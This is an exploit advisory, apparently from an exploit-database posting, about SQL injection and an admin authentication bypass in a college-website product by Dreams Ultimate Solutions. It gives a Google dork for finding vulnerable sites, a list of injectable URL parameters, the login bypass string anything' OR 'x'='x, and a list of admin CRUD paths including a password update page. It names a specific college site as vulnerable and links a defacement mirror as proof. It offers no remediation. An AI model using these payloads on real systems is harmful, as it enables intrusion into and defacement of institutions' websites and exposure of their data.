################################################################################################# # Exploit Title : Dreams Ultimate Solutions DreamSus India Improper Authorization and SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 09/11/2018 # Vendor Homepage : dreamsus.com # Tested On : Windows and Linux # Category : WebApps # Version Information : # Google Dork : intext:''Designed and Developed by Dreams Ultimate Solutions'' site:edu.in # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] + CWE-592 [ Authentication Bypass Issues ] CWE-284 [ Improper Access Control ] CWE-285 [ Improper Authorization ] ################################################################################################# # SQL Injection Exploit : /upcoming_events.php?type=event&d_id=[SQL Injection] /news_details.php?newsid=[SQL Injection] /news_home_detail.php?newsid=[SQL Injection] /college_staff.php?d_id=[SQL Injection] /research.php?type=research&d_id=[SQL Injection] /college_courses.php?type=Under%20Graduate&d_id=[SQL Injection] /college_courses.php?type=Post%20Graduate&d_id=[SQL Injection] /college_courses.php?type=Skill%20Development&d_id=[SQL Injection] /college_courses.php?type=Other%20Courses&d_id=[SQL Injection] ################################################################################################# # Admin Panel Login Path : /login.php Admin Username : anything' OR 'x'='x Admin Password : anything' OR 'x'='x /show_department.php /crud_department.php?action=update&uid=1 /show_faculty.php /crud_faculty.php?action=update&uid=1 /show_ac_year.php /crud_ac_year.php?action=update&uid=1 /show_staff_type.php /crud_staff_type.php?action=update&uid=1 /show_designation.php /crud_designation.php?action=update&uid=1 /show_event_type.php /crud_event_type.php?action=update&uid=2 /show_course_type.php /crud_course_type.php?action=update&uid=1 /show_award_type.php /crud_award_type.php?action=update&uid=1 /show_password.php /crud_password.php?action=update&uid=1 /show_department_info.php /show_staff_details.php /show_dept_facilities.php /show_courses.php /show_courses.php?type=1 /show_courses.php?type=2 /show_courses.php?type=3 /show_event.php /show_collaboration.php /show_staff_achievement.php /show_staff_acheievement_image.php /show_student_achievement.php /show_stud_acheievement_image.php /show_download.php /show_placementcell.php /show_placement_alumni.php /show_pc_collaboration.php /show_dir_admin.php /show_dir_other.php /show_news.php /show_video.php /show_notice.php /show_award.php /show_testimonial.php /show_gallery.php /show_faq.php /show_admission.php /show_previous_paper.php /show_hostel.php /show_hostel_gallery.php /show_commitee.php /show_commitee_member.php /show_commitee_work.php /show_research.php /show_publication.php /show_research_grant.php /show_feedback.php ################################################################################################# # Example Vulnerable Site => [+] spcollegejejuri.edu.in/news_home_detail.php?newsid=6%27 => [ Proof of Concept ] => zone-h.org/mirror/id/31868951 ~ archive.is/RhfMw ################################################################################################# # SQL Database Error : Fatal error: Call to a member function fetch_assoc() on boolean in /home/spcolleg/public_html/news_details.php on line 128 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################